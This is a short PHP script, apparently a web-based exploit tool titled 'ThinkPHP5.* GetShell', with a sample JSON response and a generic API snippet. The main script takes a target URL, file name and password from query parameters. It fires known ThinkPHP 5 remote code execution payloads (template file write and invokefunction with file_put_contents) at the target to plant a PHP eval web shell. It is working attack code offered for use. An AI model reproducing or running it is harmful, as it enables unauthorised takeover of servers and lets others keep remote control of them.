ThinkPHP5.* GetShell.网页版EXP

{
    "code": 10001,
    "msg": "ok",
    "url": "HTTPS://heibai.org.cn/test.php"
}

<?php
header("Content-Type:text/HTML;charset=UTF-8");
date_default_timezone_set("PRC");
$请求参数名 = "内容";
$result = file_get_contents("API网址".请求参数名);
$arr=json_decode($result,true);
if ($arr['json参数名']==1) {
    echo "返回信息：",$arr['返回信息'];
} else {
    echo $arr['返回信息'];
}
?>

<?php error_reporting(0);?>
<?php
if($currency_array["currency_call_record"]=="1"){
$counter = intval(file_get_contents("counter.dat"));  
$_SESSION['#'] = true;  
$counter++;  
$fp = fopen("counter.dat","w");  
fwrite($fp, $counter);  
fclose($fp); 
}
else{
 unlink("counter.dat");
}
?>
<?php
$url=$_GET["url"];
$file=$_GET["file"];
$content=$_GET["content"];
if ($url=="" or $file=="" or $content==""){
return_json("20011","no","need url or file or content");
}
else{
yjhtp5($url,$file,$content);
return_json("10001","ok",$url."/".$file);
}
function return_json($code,$msg,$url){
$result = array(
          'code'=>$code,
          'msg'=>$msg,
          'url'=>$url,
        );
echo stripslashes(json_encode($result,JSON_UNESCAPED_UNICODE));
}
function yjhtp5($url,$file,$content){
$vulnerability_array = array(
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=index/\think\template\driver\\file/write&cacheFile=【文件名】&content=【内容】",
"/index.php/?s=/index/\\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=【文件名】&vars[1][]=【内容】");
foreach ($vulnerability_array as $value) {
  if (strrchr($file,'.')==".php"){
     $value=str_replace("【文件名】",$file,$value);
   $value=str_replace("【内容】","<?php @eval($_POST[【密码】]);?>",$value);
   $value=str_replace("【密码】",$content,$value);
 }
 else{
   $value=str_replace("【文件名】",$file,$value);
   $value=str_replace("【内容】",$content,$value);
 }
$c = curl_init();
$url_c = $url.$value;
curl_setopt($c, CURLOPT_URL, $url_c);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($c);
curl_close($c);
}
}
?>